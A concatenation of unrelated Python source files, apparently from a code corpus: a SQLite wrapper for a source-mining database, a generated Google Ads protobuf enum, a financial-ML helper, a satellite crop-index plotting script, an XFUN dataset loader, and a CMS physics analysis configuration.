# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
>>> db = Database()
>>> rev = '1b8f23c763d08130ec2081c35e7f9fe0d392d700'
>>> repo = Repository.create('github', 'example', 'mit', rev)
>>> ret = db.add_repository(repo)
>>> ret == repo
True
>>> source_a = SourceFile.create(repo, b'void 0;', 'index.js')
>>> ret = db.add_source_file(source_a)
>>> ret == source_a
True
>>> source_b = SourceFile.create(repo, b'void 0;', 'undefined.js')
>>> source_a != source_b
True
>>> ret = db.add_source_file(source_b)
Traceback (most recent call last):
...
miner_db.database.DuplicateFileError: duplicate file contents
>>> parsed = ParsedSource(source_a.hash, [], {})
>>> ret = db.add_parsed_source(parsed)
>>> parsed == ret
True
>>> db.set_failure(source_b.hash)
>>> db.get_source(source_a.hash)
b'void 0;'
>>> repo_b = Repository.create('github', 'example-2', None, 'master')
>>> ret = db.add_repository(repo_b)
>>> ret == repo_b
True
>>> repo_c, source_file = db.get_info(source_a.hash)
>>> repo_c == repo
True
>>> source_file.path
'index.js'
"""
import logging
import sqlite3
from contextlib import closing
from .datatypes import RepositoryID, Repository, SourceFile, ParsedSource
from .utils import is_hash
logger = logging.getLogger(__name__)
class DuplicateFileError(Exception):
def __init__(self, hash_):
assert is_hash(hash_)
self.hash = hash_
super(DuplicateFileError, self).__init__("duplicate file contents")
class SourceNotFoundError(Exception):
def __init__(self, hash_):
assert is_hash(hash_)
self.hash = hash_
super(SourceNotFoundError,
self).__init__("could not find source", hash_)
class Database:
"""
Object-oriented wrapper for the sources and repository database.
Because I like writing ORMs from scratch.
"""
def __init__(self, connection=None, read_only=False):
if connection is None:
logger.warn("Using in memory database!")
self.conn = sqlite3.connect(':memory:')
else:
self.conn = connection
if not read_only:
self._set_wal()
self._initialize_db()
def _initialize_db(self):
from path import Path
SCHEMA_FILENAME = Path(__file__).parent / 'schema.sql'
with open(SCHEMA_FILENAME, encoding='UTF-8') as schema_file:
SCHEMA = schema_file.read()
del schema_file
conn = self.conn
if self._is_database_empty():
with conn:
conn.executescript(SCHEMA)
def _set_wal(self):
"""
Enable Write-Ahead-Logging (WAL). This allows for less lock contention
when there is a writer and multiple readers.
Use BEGIN IMMEDIATE TRANSACTION instead of a standard BEGIN
TRANSACTION, or even worse, BEGIN EXCLUSIVE TRANSACTION.
https://www.sqlite.org/wal.html
"""
with closing(self.conn.cursor()) as cur:
cur.execute('PRAGMA journal_mode=WAL')
status, = cur.fetchone()
assert status in ('wal', 'memory')
# Allow for IMMEDIATE transactions rather DEFERRED
self.conn.isolation_level = 'IMMEDIATE'
def _is_database_empty(self):
with closing(self.conn.cursor()) as cur:
cur.execute("SELECT COUNT(*) FROM sqlite_master WHERE type='table'")
answer, = cur.fetchone()
return int(answer) == 0
def add_repository(self, repo):
"""
Add a repository to the database.
"""
assert isinstance(repo, Repository)
with closing(self.conn.cursor()) as cur, self.conn:
cur.execute(r"""
INSERT INTO repository (owner, repo, license, revision)
VALUES (?, ?, ?, ?);
""", (repo.owner, repo.name, repo.license, repo.revision))
return repo
def add_source_file(self, source_file):
"""
Add a brand new source file to the database.
"""
assert isinstance(source_file, SourceFile)
try:
with closing(self.conn.cursor()) as cur, self.conn:
cur.execute(r"""
INSERT INTO source_file (hash, owner, repo, path, source)
VALUES (?, ?, ?, ?, ?);
""", (source_file.hash, source_file.owner, source_file.name,
source_file.path, source_file.source))
except sqlite3.IntegrityError:
raise DuplicateFileError(source_file.hash)
return source_file
def get_info(self, file_hash):
"""
Returns both the Repository AND the source file.
"""
with closing(self.conn.cursor()) as cur:
cur.execute("""
SELECT owner, repo, license, revision, path, source
FROM source_file JOIN repository USING (owner, repo)
WHERE hash = ?
""", (file_hash,))
result = cur.fetchone()
if result is None:
raise SourceNotFoundError(hash_)
owner, repo, license, revision, path, source = result
# Source must always be in bytes to be safe, but if it's already
# Unicode, return it in the one true encoding ;)
source = source.encode('utf-8') if isinstance(source, str) else source
repo_id = RepositoryID(owner, repo)
repo_info = Repository(repo_id, license=license, revision=revision)
source_info = SourceFile(repo_id, file_hash, source, path)
return repo_info, source_info
def get_source(self, hash_):
"""
Return the source code for the given SHA256 hash as a bytes object.
It is up to the client to decode the bytes into the appropriate
encoding.
"""
assert is_hash(hash_)
with closing(self.conn.cursor()) as cur:
cur.execute('SELECT source FROM source_file WHERE hash = ?', (hash_,))
result = cur.fetchone()
if result is None:
raise SourceNotFoundError(hash_)
source, = result
return source.encode('utf-8') if isinstance(source, str) else source
def add_parsed_source(self, parsed_source):
"""
Add the AST and tokens of the parsed source file.
"""
assert isinstance(parsed_source, ParsedSource)
with self.conn:
self.conn.execute(r"""
INSERT INTO parsed_source (hash, ast, tokens)
VALUES (?, ?, ?)
""", (parsed_source.hash, parsed_source.ast_as_json,
parsed_source.tokens_as_json))
return parsed_source
def set_failure(self, source_hash):
"""
Set that the given sourch hash had a parsing error.
"""
assert is_hash(source_hash)
with self.conn:
self.conn.execute(r"""INSERT INTO failure (hash) VALUES (?)""",
(source_hash,))
|
# -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: google/ads/googleads_v3/proto/enums/hotel_placeholder_field.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from google.api import annotations_pb2 as google_dot_api_dot_annotations__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='google/ads/googleads_v3/proto/enums/hotel_placeholder_field.proto',
package='google.ads.googleads.v3.enums',
syntax='proto3',
serialized_options=_b('\n!com.google.ads.googleads.v3.enumsB\033HotelsPlaceholderFieldProtoP\001ZBgoogle.golang.org/genproto/googleapis/ads/googleads/v3/enums;enums\242\002\003GAA\252\002\035Google.Ads.GoogleAds.V3.Enums\312\002\035Google\\Ads\\GoogleAds\\V3\\Enums\352\002!Google::Ads::GoogleAds::V3::Enums'),
serialized_pb=_b('\nAgoogle/ads/googleads_v3/proto/enums/hotel_placeholder_field.proto\x12\x1dgoogle.ads.googleads.v3.enums\x1a\x1cgoogle/api/annotations.proto\"\xcd\x03\n\x19HotelPlaceholderFieldEnum\"\xaf\x03\n\x15HotelPlaceholderField\x12\x0f\n\x0bUNSPECIFIED\x10\x00\x12\x0b\n\x07UNKNOWN\x10\x01\x12\x0f\n\x0bPROPERTY_ID\x10\x02\x12\x11\n\rPROPERTY_NAME\x10\x03\x12\x14\n\x10\x44\x45STINATION_NAME\x10\x04\x12\x0f\n\x0b\x44\x45SCRIPTION\x10\x05\x12\x0b\n\x07\x41\x44\x44RESS\x10\x06\x12\t\n\x05PRICE\x10\x07\x12\x13\n\x0f\x46ORMATTED_PRICE\x10\x08\x12\x0e\n\nSALE_PRICE\x10\t\x12\x18\n\x14\x46ORMATTED_SALE_PRICE\x10\n\x12\r\n\tIMAGE_URL\x10\x0b\x12\x0c\n\x08\x43\x41TEGORY\x10\x0c\x12\x0f\n\x0bSTAR_RATING\x10\r\x12\x17\n\x13\x43ONTEXTUAL_KEYWORDS\x10\x0e\x12\x0e\n\nFINAL_URLS\x10\x0f\x12\x15\n\x11\x46INAL_MOBILE_URLS\x10\x10\x12\x10\n\x0cTRACKING_URL\x10\x11\x12\x14\n\x10\x41NDROID_APP_LINK\x10\x12\x12\x18\n\x14SIMILAR_PROPERTY_IDS\x10\x13\x12\x10\n\x0cIOS_APP_LINK\x10\x14\x12\x14\n\x10IOS_APP_STORE_ID\x10\x15\x42\xf0\x01\n!com.google.ads.googleads.v3.enumsB\x1bHotelsPlaceholderFieldProtoP\x01ZBgoogle.golang.org/genproto/googleapis/ads/googleads/v3/enums;enums\xa2\x02\x03GAA\xaa\x02\x1dGoogle.Ads.GoogleAds.V3.Enums\xca\x02\x1dGoogle\\Ads\\GoogleAds\\V3\\Enums\xea\x02!Google::Ads::GoogleAds::V3::Enumsb\x06proto3')
,
dependencies=[google_dot_api_dot_annotations__pb2.DESCRIPTOR,])
_HOTELPLACEHOLDERFIELDENUM_HOTELPLACEHOLDERFIELD = _descriptor.EnumDescriptor(
name='HotelPlaceholderField',
full_name='google.ads.googleads.v3.enums.HotelPlaceholderFieldEnum.HotelPlaceholderField',
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name='UNSPECIFIED', index=0, number=0,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='UNKNOWN', index=1, number=1,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='PROPERTY_ID', index=2, number=2,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='PROPERTY_NAME', index=3, number=3,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='DESTINATION_NAME', index=4, number=4,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='DESCRIPTION', index=5, number=5,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ADDRESS', index=6, number=6,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='PRICE', index=7, number=7,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='FORMATTED_PRICE', index=8, number=8,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='SALE_PRICE', index=9, number=9,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='FORMATTED_SALE_PRICE', index=10, number=10,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='IMAGE_URL', index=11, number=11,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='CATEGORY', index=12, number=12,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='STAR_RATING', index=13, number=13,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='CONTEXTUAL_KEYWORDS', index=14, number=14,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='FINAL_URLS', index=15, number=15,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='FINAL_MOBILE_URLS', index=16, number=16,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='TRACKING_URL', index=17, number=17,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ANDROID_APP_LINK', index=18, number=18,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='SIMILAR_PROPERTY_IDS', index=19, number=19,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='IOS_APP_LINK', index=20, number=20,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='IOS_APP_STORE_ID', index=21, number=21,
serialized_options=None,
type=None),
],
containing_type=None,
serialized_options=None,
serialized_start=161,
serialized_end=592,
)
_sym_db.RegisterEnumDescriptor(_HOTELPLACEHOLDERFIELDENUM_HOTELPLACEHOLDERFIELD)
_HOTELPLACEHOLDERFIELDENUM = _descriptor.Descriptor(
name='HotelPlaceholderFieldEnum',
full_name='google.ads.googleads.v3.enums.HotelPlaceholderFieldEnum',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
_HOTELPLACEHOLDERFIELDENUM_HOTELPLACEHOLDERFIELD,
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=131,
serialized_end=592,
)
_HOTELPLACEHOLDERFIELDENUM_HOTELPLACEHOLDERFIELD.containing_type = _HOTELPLACEHOLDERFIELDENUM
DESCRIPTOR.message_types_by_name['HotelPlaceholderFieldEnum'] = _HOTELPLACEHOLDERFIELDENUM
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
HotelPlaceholderFieldEnum = _reflection.GeneratedProtocolMessageType('HotelPlaceholderFieldEnum', (_message.Message,), dict(
DESCRIPTOR = _HOTELPLACEHOLDERFIELDENUM,
__module__ = 'google.ads.googleads_v3.proto.enums.hotel_placeholder_field_pb2'
,
__doc__ = """Values for Hotel placeholder fields. For more information about dynamic
remarketing feeds, see
https://support.google.com/google-ads/answer/6053288.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v3.enums.HotelPlaceholderFieldEnum)
))
_sym_db.RegisterMessage(HotelPlaceholderFieldEnum)
DESCRIPTOR._options = None
# @@protoc_insertion_point(module_scope)
|
import pandas as pd
import numpy as np
from adv_finance.multiprocess import mp_pandas_obj
def mp_num_co_events(timestamps, t1, molecule):
"""
Snippet 4.1 (page 60) Estimating The Uniqueness Of A Label
Compute the number of concurrent events per bar.
+molecule[0] is the date of the first event on which the weight will be computed
+moldecule[-1] is the date of the last event on which the weight will be computed
Any event that starts before t1[molecule].max() impacts the count.
:param timestamps:
:param t1:
:param molecule:
:return:
"""
# 1) Find events that span the period [molecule[0], molecule[-1]]
t1 = t1.fillna(timestamps[-1]) # unclosed events still must impact other weights
t1 = t1[t1 >= molecule[0]] # events that end at or after molecule[0]
t1_end = min(t1[molecule].max(), t1.index[-1])
t1 = t1.loc[:t1_end] # events that start at or before t1[molecule].max()
# t1 = t1.loc[:t1[molecule].max()] # events that start at or before t1[molecule].max()
# 2) Count events spanning a bar
iloc = timestamps.searchsorted(np.array([t1.index[0], t1.max()]))
count = pd.Series(0, index=timestamps[iloc[0]:iloc[1] + 1])
for t_in, t_out in t1.iteritems():
count.loc[t_in:t_out] += 1
return count.loc[molecule[0]:t1[molecule].max()]
def get_num_co_events(timestamps, t1, num_threads=1):
""" Calculate the number of co events
:param timestamps:
:param t1:
:param num_threads:
:return:
"""
return mp_pandas_obj(mp_num_co_events, ('molecule', t1.index),
num_threads, timestamps=timestamps, t1=t1)
|
####
#### July 2. This is a copy of the version we had from before. plotting one year.
#### Here we are extending it to 2 years. Since August of a given year to the end
#### of the next year.
####
"""
Just generate peak plots for Grant 2017 fields
for all cultivars; EVI and my peak finder
"""
import matplotlib.backends.backend_pdf
import csv
import numpy as np
import pandas as pd
# import geopandas as gpd
from IPython.display import Image
# from shapely.geometry import Point, Polygon
from math import factorial
import datetime
import time
import scipy
import scipy.signal
import os, os.path
import matplotlib
from statsmodels.sandbox.regression.predstd import wls_prediction_std
from sklearn.linear_model import LinearRegression
from patsy import cr
# from pprint import pprint
import matplotlib.pyplot as plt
import seaborn as sb
from pandas.plotting import register_matplotlib_converters
register_matplotlib_converters()
import sys
start_time = time.time()
# search path for modules
# look @ https://stackoverflow.com/questions/67631/how-to-import-a-module-given-the-full-path
####################################################################################
###
### Local
###
####################################################################################
################
###
### Core path
###
sys.path.append('/Users/hn/Documents/00_GitHub/Ag/remote_sensing/python/')
################
###
### Directories
###
####################################################################################
###
### Aeolus Core path
###
####################################################################################
sys.path.append('/home/hnoorazar/remote_sensing_codes/')
###
### Import remote cores
###
import remote_sensing_core as rc
import remote_sensing_plot_core as rcp
####################################################################################
###
### Parameters
###
####################################################################################
eleven_colors = ["gray", "lightcoral", "red", "peru",
"darkorange", "gold", "olive", "green",
"blue", "violet", "deepskyblue"]
# indeks = "EVI"
# irrigated_only = 1
# SF_year = 2017
given_county = "Grant"
jumps = sys.argv[1]
indeks = sys.argv[2]
irrigated_only = int(sys.argv[3])
SF_year = int(sys.argv[4])
regularized = True
####################################################################################
###
### Aeolus Directories
###
####################################################################################
if irrigated_only == True:
output_Irr = "irrigated_only"
else:
output_Irr = "non_irrigated_only"
regular_data_dir = "/data/hydro/users/Hossein/remote_sensing/03_Regularized_TS/70_cloud/2Yrs/"
if jumps == "yes":
regular_output_dir = "/data/hydro/users/Hossein/remote_sensing/04_RegularFilledGaps_plots_tbls/2Yrs_plots_70Cloud_Regular_wJumps/" + \
given_county + "_" + str(SF_year) + "_regular_" + output_Irr + "_" + indeks + "/"
f_name = "01_Regular_filledGap_" + given_county + "_SF_" + str(SF_year) + "_" + indeks + ".csv"
else:
regular_data_dir = regular_data_dir + "/noJump_Regularized/"
regular_output_dir = "/data/hydro/users/Hossein/remote_sensing/04_RegularFilledGaps_plots_tbls/2Yrs_plots_70Cloud_Regular_noJumps/" + \
given_county + "_" + str(SF_year) + "_regular_" + output_Irr + "_" + indeks + "/"
f_name = "01_Regular_filledGap_" + given_county + "_SF_" + str(SF_year) + "_" + indeks + ".csv"
plot_dir_base = regular_output_dir
print ("plot_dir_base is " + plot_dir_base)
param_dir = "/home/hnoorazar/remote_sensing_codes/parameters/"
#####################################################################################
data_dir = regular_data_dir
output_dir = regular_output_dir
plot_dir_base = output_dir
print ("plot_dir_base is " + plot_dir_base)
os.makedirs(output_dir, exist_ok=True)
os.makedirs(plot_dir_base, exist_ok=True)
print ("_________________________________________________________")
print ("data dir is:")
print (data_dir)
print ("_________________________________________________________")
print ("output_dir is:")
print (output_dir)
print ("_________________________________________________________")
####################################################################################
###
### Read data
###
####################################################################################
a_df = pd.read_csv(data_dir + f_name, low_memory=False)
##################################################################
##################################################################
####
#### plots has to be exact. So, we need
#### to filter out NASS, and filter by last survey date
####
##################################################################
##################################################################
a_df = a_df[a_df['county']== given_county] # Filter Grant
a_df = rc.filter_out_NASS(a_df) # Toss NASS
a_df = rc.filter_by_lastSurvey(a_df, year = SF_year) # filter by last survey date
a_df['SF_year'] = SF_year
# a_df = a_df[a_df['image_year'] == SF_year]
if irrigated_only == True:
a_df = rc.filter_out_nonIrrigated(a_df)
output_Irr = "irrigated_only"
else:
output_Irr = "non_irrigated_only"
a_df = rc.filter_out_Irrigated(a_df)
######################
# The following columns do not exist in the old data
#
if not('DataSrc' in a_df.columns):
print ("Data source is being set to NA")
a_df['DataSrc'] = "NA"
if not('CovrCrp' in a_df.columns):
print ("CovrCrp is being set to NA")
a_df['CovrCrp'] = "NA"
if (indeks == "EVI"):
a_df = rc.initial_clean_EVI(a_df)
print ("initial_clean_EVI")
else:
a_df = rc.initial_clean_NDVI(a_df)
print ("initial_clean_NDVI")
an_EE_TS = a_df.copy()
del(a_df)
### List of unique polygons
polygon_list = np.sort(an_EE_TS['ID'].unique())
print ("_____________________________________")
print("len(polygon_list)")
print (len(polygon_list))
print ("_____________________________________")
counter = 0
for a_poly in polygon_list:
if (counter%1000 == 0):
print ("_____________________________________")
print ("counter: " + str(counter))
curr_field = an_EE_TS[an_EE_TS['ID']==a_poly].copy()
################################################################
# Sort by DoY (sanitary check)
curr_field.sort_values(by=['image_year', 'doy'], inplace=True)
################################################################
ID = curr_field['ID'].unique()[0]
plant = curr_field['CropTyp'].unique()[0]
plant = plant.replace("/", "_")
plant = plant.replace(",", "_")
plant = plant.replace(" ", "_")
plant = plant.replace("__", "_")
county = curr_field['county'].unique()[0]
sub_out = plant + "/" # "/plant_based_plots/" + plant + "/"
plot_path = plot_dir_base + sub_out
plot_path = plot_path # + str(len(SG_max_DoYs_series)) + "_peaks/"
os.makedirs(plot_path, exist_ok=True)
# print ("plot_path is " + plot_path)
if (len(os.listdir(plot_path)) < 100):
#
# Set up Canvas
#
fig, axs = plt.subplots(2, 2, figsize=(20,12),
sharex='col', sharey='row',
gridspec_kw={'hspace': 0.1, 'wspace': .1})
(ax1, ax2), (ax3, ax4) = axs
ax1.grid(True)
ax2.grid(True)
ax3.grid(True)
ax4.grid(True)
rcp.savitzky_2yrs_panel(crr_fld = curr_field, idx = indeks, deltA = 0.1, SFYr = SF_year, ax = ax1)
rcp.savitzky_2yrs_panel(crr_fld = curr_field, idx = indeks, deltA = 0.2, SFYr = SF_year, ax = ax2)
rcp.savitzky_2yrs_panel(crr_fld = curr_field, idx = indeks, deltA = 0.3, SFYr = SF_year, ax = ax3)
rcp.savitzky_2yrs_panel(crr_fld = curr_field, idx = indeks, deltA = 0.4, SFYr = SF_year, ax = ax4)
fig_name = plot_path + county + "_" + plant + "_SF_year_" + str(SF_year) + "_" + ID + '.png'
os.makedirs(output_dir, exist_ok=True)
os.makedirs(plot_dir_base, exist_ok=True)
plt.savefig(fname = fig_name, dpi=250, bbox_inches='tight')
counter += 1
print ("done")
end_time = time.time()
print(end_time - start_time)
|
# Lint as: python3
import json
import logging
import os
import datasets
from layoutlmft.data.utils import load_image, merge_bbox, normalize_bbox, simplify_bbox
from transformers import AutoTokenizer
_URL = "https://github.com/doc-analysis/XFUN/releases/download/v1.0/"
_LANG = ["zh", "de", "es", "fr", "en", "it", "ja", "pt"]
logger = logging.getLogger(__name__)
class XFUNConfig(datasets.BuilderConfig):
"""BuilderConfig for XFUN."""
def __init__(self, lang, additional_langs=None, **kwargs):
"""
Args:
lang: string, language for the input text
**kwargs: keyword arguments forwarded to super.
"""
super(XFUNConfig, self).__init__(**kwargs)
self.lang = lang
self.additional_langs = additional_langs
class XFUN(datasets.GeneratorBasedBuilder):
"""XFUN dataset."""
BUILDER_CONFIGS = [XFUNConfig(name=f"xfun.{lang}", lang=lang) for lang in _LANG]
tokenizer = AutoTokenizer.from_pretrained("xlm-roberta-base")
def _info(self):
return datasets.DatasetInfo(
features=datasets.Features(
{
"id": datasets.Value("string"),
"input_ids": datasets.Sequence(datasets.Value("int64")),
"bbox": datasets.Sequence(datasets.Sequence(datasets.Value("int64"))),
"labels": datasets.Sequence(
datasets.ClassLabel(
names=["O", "B-QUESTION", "B-ANSWER", "B-HEADER", "I-ANSWER", "I-QUESTION", "I-HEADER"]
)
),
"image": datasets.Array3D(shape=(3, 224, 224), dtype="uint8"),
"entities": datasets.Sequence(
{
"start": datasets.Value("int64"),
"end": datasets.Value("int64"),
"label": datasets.ClassLabel(names=["HEADER", "QUESTION", "ANSWER"]),
}
),
"relations": datasets.Sequence(
{
"head": datasets.Value("int64"),
"tail": datasets.Value("int64"),
"start_index": datasets.Value("int64"),
"end_index": datasets.Value("int64"),
}
),
}
),
supervised_keys=None,
)
def _split_generators(self, dl_manager):
"""Returns SplitGenerators."""
urls_to_download = {
"train": [f"{_URL}{self.config.lang}.train.json", f"{_URL}{self.config.lang}.train.zip"],
"val": [f"{_URL}{self.config.lang}.val.json", f"{_URL}{self.config.lang}.val.zip"],
# "test": [f"{_URL}{self.config.lang}.test.json", f"{_URL}{self.config.lang}.test.zip"],
}
downloaded_files = dl_manager.download_and_extract(urls_to_download)
train_files_for_many_langs = [downloaded_files["train"]]
val_files_for_many_langs = [downloaded_files["val"]]
# test_files_for_many_langs = [downloaded_files["test"]]
if self.config.additional_langs:
additional_langs = self.config.additional_langs.split("+")
if "all" in additional_langs:
additional_langs = [lang for lang in _LANG if lang != self.config.lang]
for lang in additional_langs:
urls_to_download = {"train": [f"{_URL}{lang}.train.json", f"{_URL}{lang}.train.zip"]}
additional_downloaded_files = dl_manager.download_and_extract(urls_to_download)
train_files_for_many_langs.append(additional_downloaded_files["train"])
logger.info(f"Training on {self.config.lang} with additional langs({self.config.additional_langs})")
logger.info(f"Evaluating on {self.config.lang}")
logger.info(f"Testing on {self.config.lang}")
return [
datasets.SplitGenerator(name=datasets.Split.TRAIN, gen_kwargs={"filepaths": train_files_for_many_langs}),
datasets.SplitGenerator(
name=datasets.Split.VALIDATION, gen_kwargs={"filepaths": val_files_for_many_langs}
),
# datasets.SplitGenerator(name=datasets.Split.TEST, gen_kwargs={"filepaths": test_files_for_many_langs}),
]
def _generate_examples(self, filepaths):
for filepath in filepaths:
logger.info("Generating examples from = %s", filepath)
with open(filepath[0], "r") as f:
data = json.load(f)
for doc in data["documents"]:
doc["img"]["fpath"] = os.path.join(filepath[1], doc["img"]["fname"])
image, size = load_image(doc["img"]["fpath"])
document = doc["document"]
tokenized_doc = {"input_ids": [], "bbox": [], "labels": []}
entities = []
relations = []
id2label = {}
entity_id_to_index_map = {}
empty_entity = set()
for line in document:
if len(line["text"]) == 0:
empty_entity.add(line["id"])
continue
id2label[line["id"]] = line["label"]
relations.extend([tuple(sorted(l)) for l in line["linking"]])
tokenized_inputs = self.tokenizer(
line["text"],
add_special_tokens=False,
return_offsets_mapping=True,
return_attention_mask=False,
)
text_length = 0
ocr_length = 0
bbox = []
for token_id, offset in zip(tokenized_inputs["input_ids"], tokenized_inputs["offset_mapping"]):
if token_id == 6:
bbox.append(None)
continue
text_length += offset[1] - offset[0]
tmp_box = []
while ocr_length < text_length:
ocr_word = line["words"].pop(0)
ocr_length += len(
self.tokenizer._tokenizer.normalizer.normalize_str(ocr_word["text"].strip())
)
tmp_box.append(simplify_bbox(ocr_word["box"]))
if len(tmp_box) == 0:
tmp_box = last_box
bbox.append(normalize_bbox(merge_bbox(tmp_box), size))
last_box = tmp_box # noqa
bbox = [
[bbox[i + 1][0], bbox[i + 1][1], bbox[i + 1][0], bbox[i + 1][1]] if b is None else b
for i, b in enumerate(bbox)
]
if line["label"] == "other":
label = ["O"] * len(bbox)
else:
label = [f"I-{line['label'].upper()}"] * len(bbox)
label[0] = f"B-{line['label'].upper()}"
tokenized_inputs.update({"bbox": bbox, "labels": label})
if label[0] != "O":
entity_id_to_index_map[line["id"]] = len(entities)
entities.append(
{
"start": len(tokenized_doc["input_ids"]),
"end": len(tokenized_doc["input_ids"]) + len(tokenized_inputs["input_ids"]),
"label": line["label"].upper(),
}
)
for i in tokenized_doc:
tokenized_doc[i] = tokenized_doc[i] + tokenized_inputs[i]
relations = list(set(relations))
relations = [rel for rel in relations if rel[0] not in empty_entity and rel[1] not in empty_entity]
kvrelations = []
for rel in relations:
pair = [id2label[rel[0]], id2label[rel[1]]]
if pair == ["question", "answer"]:
kvrelations.append(
{"head": entity_id_to_index_map[rel[0]], "tail": entity_id_to_index_map[rel[1]]}
)
elif pair == ["answer", "question"]:
kvrelations.append(
{"head": entity_id_to_index_map[rel[1]], "tail": entity_id_to_index_map[rel[0]]}
)
else:
continue
def get_relation_span(rel):
bound = []
for entity_index in [rel["head"], rel["tail"]]:
bound.append(entities[entity_index]["start"])
bound.append(entities[entity_index]["end"])
return min(bound), max(bound)
relations = sorted(
[
{
"head": rel["head"],
"tail": rel["tail"],
"start_index": get_relation_span(rel)[0],
"end_index": get_relation_span(rel)[1],
}
for rel in kvrelations
],
key=lambda x: x["head"],
)
chunk_size = 512
for chunk_id, index in enumerate(range(0, len(tokenized_doc["input_ids"]), chunk_size)):
item = {}
for k in tokenized_doc:
item[k] = tokenized_doc[k][index : index + chunk_size]
entities_in_this_span = []
global_to_local_map = {}
for entity_id, entity in enumerate(entities):
if (
index <= entity["start"] < index + chunk_size
and index <= entity["end"] < index + chunk_size
):
entity["start"] = entity["start"] - index
entity["end"] = entity["end"] - index
global_to_local_map[entity_id] = len(entities_in_this_span)
entities_in_this_span.append(entity)
relations_in_this_span = []
for relation in relations:
if (
index <= relation["start_index"] < index + chunk_size
and index <= relation["end_index"] < index + chunk_size
):
relations_in_this_span.append(
{
"head": global_to_local_map[relation["head"]],
"tail": global_to_local_map[relation["tail"]],
"start_index": relation["start_index"] - index,
"end_index": relation["end_index"] - index,
}
)
item.update(
{
"id": f"{doc['id']}_{chunk_id}",
"image": image,
"entities": entities_in_this_span,
"relations": relations_in_this_span,
}
)
yield f"{doc['id']}_{chunk_id}", item
|
import FWCore.ParameterSet.Config as cms
process = cms.Process('ANALYSIS')
process.load('Configuration.StandardSequences.Services_cff')
# Specify IdealMagneticField ESSource (needed for CMSSW 730)
process.load("Configuration.StandardSequences.GeometryRecoDB_cff")
process.load("Configuration.StandardSequences.MagneticField_cff")
process.load('Configuration.StandardSequences.FrontierConditions_GlobalTag_cff')
from Configuration.AlCa.autoCond import autoCond
process.GlobalTag.globaltag=autoCond['run1_data']
process.load('FWCore.MessageService.MessageLogger_cfi')
process.MessageLogger.GammaJetAnalysis=dict()
process.MessageLogger.cerr.FwkReport.reportEvery=cms.untracked.int32(1000)
#load the analyzer
process.load('Calibration.HcalCalibAlgos.gammaJetAnalysis_cfi')
# load energy corrector
process.load('JetMETCorrections.Configuration.JetCorrectionProducers_cff')
# run over files
process.GammaJetAnalysis.rootHistFilename = cms.string('PhoJet_tree_CHS_data2012_noGJetProd.root')
process.GammaJetAnalysis.doPFJets = cms.bool(True)
process.GammaJetAnalysis.doGenJets = cms.bool(False)
process.TFileService = cms.Service("TFileService",
fileName = cms.string('PhoJet_tree_CHS_data2012_noGJetProd.root'))
# trigger names should not end with '_'
process.GammaJetAnalysis.photonTriggers = cms.vstring(
'HLT_Photon20_CaloIdVL_IsoL','HLT_Photon30_CaloIdVL_IsoL',
'HLT_Photon50_CaloIdVL_IsoL','HLT_Photon75_CaloIdVL_IsoL',
'HLT_Photon90_CaloIdVL_IsoL','HLT_Photon135',
'HLT_Photon150','HLT_Photon160')
# triggers for CMSSW 730
process.GammaJetAnalysis.photonTriggers += cms.vstring(
'HLT_Photon22', 'HLT_Photon30', 'HLT_Photon36',
'HLT_Photon50', 'HLT_Photon75',
'HLT_Photon90', 'HLT_Photon120', 'HLT_Photon175',
'HLT_Photon250_NoHE', 'HLT_Photon300_NoHE'
)
# to disable photonTriggers assign an empty vstring
#process.GammaJetAnalysis.photonTriggers = cms.vstring()
process.source = cms.Source("PoolSource",
fileNames = cms.untracked.vstring(
'file:/tmp/andriusj/Run2012A_Photon_22Jan2013-002618943913.root'
)
)
process.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(-1) )
process.options = cms.untracked.PSet( wantSummary = cms.untracked.bool(False) )
# Load jets and pfNoPileUP
process.load('RecoJets.Configuration.RecoPFJets_cff')
process.load('CommonTools.ParticleFlow.PF2PAT_cff')
process.load("CommonTools.ParticleFlow.pfNoPileUp_cff")
process.seq_ak4PFCHS= cms.Sequence( process.particleFlowPtrs *
process.pfNoPileUpJMESequence *
process.ak4PFJetsCHS )
